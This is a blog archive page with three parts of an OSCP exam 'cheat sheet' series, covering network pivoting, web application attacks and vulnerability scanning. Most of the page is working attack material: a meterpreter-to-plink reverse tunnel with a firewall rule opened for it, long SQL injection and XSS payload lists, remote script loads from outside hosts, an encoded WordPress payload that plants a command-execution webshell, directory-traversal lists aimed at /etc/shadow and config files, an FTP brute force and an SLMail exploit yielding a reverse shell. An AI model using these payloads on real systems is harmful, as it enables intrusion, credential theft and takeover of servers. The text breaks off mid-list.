Monthly Archives: March 2017

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide – Network Pivoting – PART 7

 

Network Pivoting using SSH tunneling and forwarding:

 

Is Microsoft Network Monitor was installed? If so, depending on which version, you may have to run netmon, netcap, or nmcap, each of which has slightly different features and syntax. For example, if Network Monitor 3 is installed running, you could execute the following command at a shell prompt:

C:\> NMCap /network 1 /capture /file c:\windows\temp\capt.cap /timeafter 10 minutes

… which starts a capture on network 1 writing to the specified location for ten minutes.

 

Setup used for this tutorial:

Attacker IP: 192.168.1.100

Victim IP: 192.168.1.200 , second NIC 172.16.1.73 (connected to 172.16.1.0/24 network a windows xp pro workstation)

Corporate server IP: 172.16.1.80

I will use a vmware based lab ,all  addresses used for this tutorial are internal adresses only.

1. Once we received our meterpreter session on the attacking machine we will first upload our tools, PLINK and FPipe.

meterpreter > upload plink.exe c:\\
[*] uploading  : plink.exe -> c:\
[*] uploaded   : plink.exe -> c:\\plink.exe
meterpreter > upload FPipe.exe c:\\
[*] uploading  : FPipe.exe -> c:\
[*] uploaded   : FPipe.exe -> c:\\FPipe.exe

2. Open a command prompt:

meterpreter > execute -i -H -f cmd.exe
Process 1844 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>

3. Create SSH tunnel back to our attacking machine using PLINK

C:\>plink -P 22 -l root -pw qwe123 -C -R 3389:127.0.0.1:1234 192.168.1.100
Last login: Fri Jul 17 19:49:35 2009 from 212.235.66.178
Linux 2.6.21.5.
 exploit ~ #
plink -P "ssh server port" -l "ssh server user name" -pw "ssh server password" -C -R "local port":127.0.0.1:"remote port" "ssh server ip address"

4. Send command prompt to background by pressing CTRL+Z on the keyboard.

Background channel 3? [y/N]  y
[-] core_channel_interact: Operation failed: 1168
meterpreter >

* The command prompt is still running on the background and it is still active on the victim machine, you can resume it by typing the command  “interact” and the channel number:

meterpreter > interact 3
Interacting with channel 3...
 exploit ~ #

5. Open a new command prompt channel

meterpreter > execute -i -H -f cmd.exe
Process 3472 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>

6. Forwarding traffic to the server using FPipe

C:\>Fpipe.exe -l 1234 -s 1234 -r 3389 172.16.1.80

(You can add the -v switch for verbosity, you can also background this channel and continue working with meterpreter)

Let’s take a look at some of the FPipe options used here:

-l    – listening port number
-r    – remote port number
-s    – outbound source port number

If windows firewall blocks this use the following command to allow:

c:\>netsh firewall add portopening TCP 1234 “Name of the exception” enable all

 

7. RDP to the server machine
before we do that lets verify that our attacking is listening on port 3389.

exploit ~ # netstat -antp | grep 3389
netstat -antp | grep 3389
tcp        0      0 127.0.0.1:3389          0.0.0.0:*               LISTEN     3494/4
 exploit ~ # rdesktop 127.0.0.1

If everything went well a remote desktop session should open.

 

Tools used in this tutorial:

PLINK

Plink is a command-line interface to the PuTTY (the Telnet and SSH client itself)  back ends.

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

FPipe

FPipe is a source port forwarder/redirector created by foundstone. It can create a TCP or UDP stream with a source port of your choice. This is useful for getting past firewalls that allow traffic with source ports of say 23, to connect with internal servers.

http://www.foundstone.com/us/resources/proddesc/fpipe.htm

The Metasploit Framework

http://www.metasploit.com/framework/download/

Other Related Tools

Data Pipe
This is a simple TCP/IP socket redirection application that offers a little more complexity than the simple fork-based datapipes that are commonly available. This source has been successfully compiled and used on Linux, FreeBSD, and Win32. I have released it into the public-domain.

http://jeff.bovine.net/Datapipe

WinRelay
WinRelay is a TCP/UDP forwarder/redirector that works with both IPv4 and IPv6. You can choose the port and IP it will listen on, the source port and IP that it will connect from, and the port and IP that it will connect to.
http://ntsecurity.nu/toolbox/winrelay/

Socat
multipurpose relay
http://www.dest-unreach.org/socat/

Share Button

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- SQLi XSS Web App Attacks – PART 5

 

SQL Injection Commands

 

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to login to the system, otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request that we’ll carry out will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

After a short analysis we notice that the query returns a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password.
In some systems the first row of a user table would be an administrator user. This may be the profile returned in some cases. Another example of query is the following:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password'))) 

$username = 1' or '1' = '1'))/*
$password = foo

In this way, we’ll get the following query:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

(Due to the inclusion of a comment delimiter in the $username value the password portion of the query will be ignored.)
The URL request will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo 

SELECT * FROM products WHERE id_product=$id_product

Consider also the request to a script who executes the query above:

http://www.example.com/product.php?id=10

When the tester tries a valid value (e.g. 10 in this case), the application will return the description of a product. A good way to test if the application is vulnerable in this scenario is play with logic, using the operators AND and OR.
Consider the request:

http://www.example.com/product.php?id=10 AND 1=2
SELECT * FROM products WHERE id_product=10 AND 1=2

In this case, probably the application would return some message telling us there is no content available or a blank page. Then the tester can send a true statement and check if there is a valid result:

http://www.example.com/product.php?id=10 AND 1=1

Consider the following SQL query:

SELECT * FROM products WHERE id_product=$id_product

A way to exploit the above scenario would be:

http://www.example.com/product.php?id=10; INSERT INTO users (…)
'
or 1=1
or 1=1--
or 1=1#
or 1=1*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'*
admin' or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'*
1234' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"*
admin" or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"*
1234" AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055



Cross Site Scripting Commands:

Technique Vector/Payload *
* In URLs: & => %26 , # => %23 , + => %2B
HTML Context
Tag Injection
<svg onload=alert(1)>
“><svg onload=alert(1)//
HTML Context
Inline Injection
“onmouseover=alert(1)//
“autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
‘-alert(1)-‘
‘-alert(1)//
Javascript Context
Code Injection
(escaping the escape)
\’-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
Without Parenthesis <svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
Filter Bypass
Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
Body Tag <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers <x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
Code Reuse
Inline Script
<script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1Doubling
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1=’1’onxxx=1
<x 1=”1″onxxx=1
<[S]x onx[S]xx=1

[S] = stripped char or string

<x </onxxx=1
<x 1=”>” onxxx=1
<http://onxxx%3D1/
Generic Source Breaking <x onxxx=alert(1) 1=’
Browser Control <svg onload=setInterval(function(){with(document)body.
appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input Single Input (script-based)
‘onload=alert(1)><svg/1=’ ‘>alert(1)</script><script/1=’
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)”>’onload=”/*<svg/1=’
`-alert(1)”>’onload=”`<svg/1=’
*/</script>’>alert(1)/*<script/1=’
Multi Input
Double Input Triple Input
p=<svg/1=’&q=’onload=alert(1)> p=<svg 1=’&q=’onload=’/*&r=*/alert(1)’>
Without Event Handlers <script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS <iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload Injection in Filename
“><img src=1 onerror=alert(1)>.gifInjection in Metadata
$ exiftool -Artist='”><img src=1 onerror=alert(1)>’ FILENAME.jpeg

Injection with SVG File
<svg xmlns=”http://www.w3.org/2000/svg” onload=”alert(document.domain)”/>

Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Google Chrome
Auditor Bypass
(up to v51)
<script src=”data:&comma;alert(1)//
“><script src=data:&comma;alert(1)//<script src=”//brutelogic.com.br&sol;1.js&num;
“><script src=//brutelogic.com.br&sol;1.js&num;

<link rel=import href=”data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
“><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;

PHP File for
XHR Remote Call
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC <base href=//0>

$ while:; do echo “alert(1)” | nc -lp80; done

Portable WordPress RCE <script/src=”data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Default SRC tag to get past filters that check SRC domain

This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .

Edited by Abdullah Hussam(@Abdulahhusam).

<IMG SRC=# onmouseover="alert('xxs')">

Default SRC tag by leaving it empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC tag by leaving it out entirely

<IMG onmouseover="alert('xxs')">

On error alert

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror and javascript alert encode

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Decimal HTML character references

all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

Decimal HTML character references without trailing semicolons

This is often effective in XSS that attempts to look for “&#XX;”, since most people don’t know about padding – up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I’ve seen this in the wild):

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Hexadecimal HTML character references without trailing semicolons

This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol – which is not true with hex HTML characters).

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Embedded tab

Used to break up the cross site scripting attack:

<IMG SRC="jav	ascript:alert('XSS');">

Embedded Encoded tab

Use this one to break up XSS :

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded newline to break up XSS

Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Embedded carriage return to break up XSS

(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I’ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null breaks up JavaScript directive

Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00is much more useful and helped me bypass certain real world filters with a variation on this example:

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out



DIRECTORY TRAVERSAL COMMANDS:


/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow
/etc/passwd
/etc/passwd
../etc/passwd
../etc/passwd
../../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/shadow
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
 ../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Share Button

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- Vulnerability Scanning – PART 4

 

 

Image result for openvas

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 33,000 in total (as of December 2013).

All OpenVAS products are Free Software. Most components are licensed under the GNU General Public License (GNU GPL).

 

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created

[i] This script synchronizes an NVT collection with the ‘OpenVAS NVT Feed’.
[i] Online information about this feed: ‘http://www.openvas.org/openvas-nvt-feed

sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml

Write out database with 1 new entries
Data Base Updated
Restarting Greenbone Security Assistant: gsad.
User created with password ‘6062d074-0a4c-4de1-a26a-5f9f055b7c88’.

root@kali:~# openvas-start
Starting OpenVas Services
Starting Greenbone Security Assistant: gsad.
Starting OpenVAS Scanner: openvassd.
Starting OpenVAS Manager: openvasmd.

openvas vulnerability scanner

 

 

Image result for metasploit

 

 

root@kali:~# systemctl start postgresql
To have this service start at boot time, enable it using systemctl as follows:
root@kali:~# systemctl enable postgresql

 

root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ — –=[ 1084 exploits – 675 auxiliary – 181 post
+ — –=[ 277 payloads – 29 encoders – 8 nops
msf > show -h
[*] Valid parameters for the “show” command are: all, encoders, nops, exploits,
payloads, auxiliary, plugins, options

msf > show auxiliary

msf> use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > info
Name: SNMP Enumeration Module
Module: auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > show options
Module options (auxiliary/scanner/snmp/snmp_enum):

msf auxiliary(snmp_enum) >

root@kali:~# msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /root/password-file.txt
msf auxiliary(ftp_login) > set USERPASS_FILE /root/users.txt
msf auxiliary(ftp_login) > set RHOSTS 192.168.11.219
msf auxiliary(ftp_login) > run
*] Connecting to FTP server 192.168.11.219:21…
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP – [003/341] – Failed FTP login for ‘mike’:”
[*] 192.168.11.219:21 FTP – [004/341] – Attempting FTP login for ‘ubuntu’:”
[*] 192.168.11.219:21 FTP – [004/341] – Failed FTP login for ‘ubuntu’:”
[*] 192.168.11.219:21 FTP – [005/341] – Attempting FTP login for ‘root’:’root’
[*] 192.168.11.219:21 FTP – [005/341] – Failed FTP login for ‘root’:’root’
[*] 192.168.11.219:21 FTP – [006/341] – Attempting FTP login for ‘bob’:’bob’

[-] 192.168.11.219:21 FTP – [006/341] – Caught EOFError, reconnecting
[*] Connecting to FTP server 192.168.11.219:21…
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP – [006/341] – Failed FTP login for ‘bob’:’bob’
[*] 192.168.11.219:21 FTP – [007/341] – Attempting FTP login for ‘mike’:’mike’
[*] 192.168.11.219:21 FTP – [007/341] – Failed FTP login for ‘mike’:’mike’
[*] 192.168.11.219:21 FTP – [008/341] – Attempting login for ‘ubuntu’:’ubuntu’
[+] 192.168.11.219:21 – Successful FTP login for ‘ubuntu’:’ubuntu’
[*] 192.168.11.219:21 – User ‘ubuntu’ has READ/WRITE access

 

root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ — –=[ 1084 exploits – 675 auxiliary – 181 post
+ — –=[ 277 payloads – 29 encoders – 8 nops
msf > search pop3
msf > use exploit/windows/pop3/seattlelab_pass
msf exploit(seattlelab_pass) > show options
msf exploit(seattlelab_pass) > info
Module options (exploit/windows/pop3/seattlelab_pass):
Current Setting Required Description
—- ————— ——– ———–
yes The target address
yes The target port

 

msf exploit(seattlelab_pass) > exploit
[*] Started reverse handler on 192.168.10.5:4444
[*] Trying Windows NT/2000/XP/2003 (SLMail 5.5) using jmp esp at 5f4a358f
[*] Command shell session 1 opened (192.168.10.5:4444 -> 192.168.11.35:49161)
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.
All rights reserved.
C:\Program Files\SLmail\System>

 

 

 

Image result for nmap

 

 

Scripts
afp-path-vuln

Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos

Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec

Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687

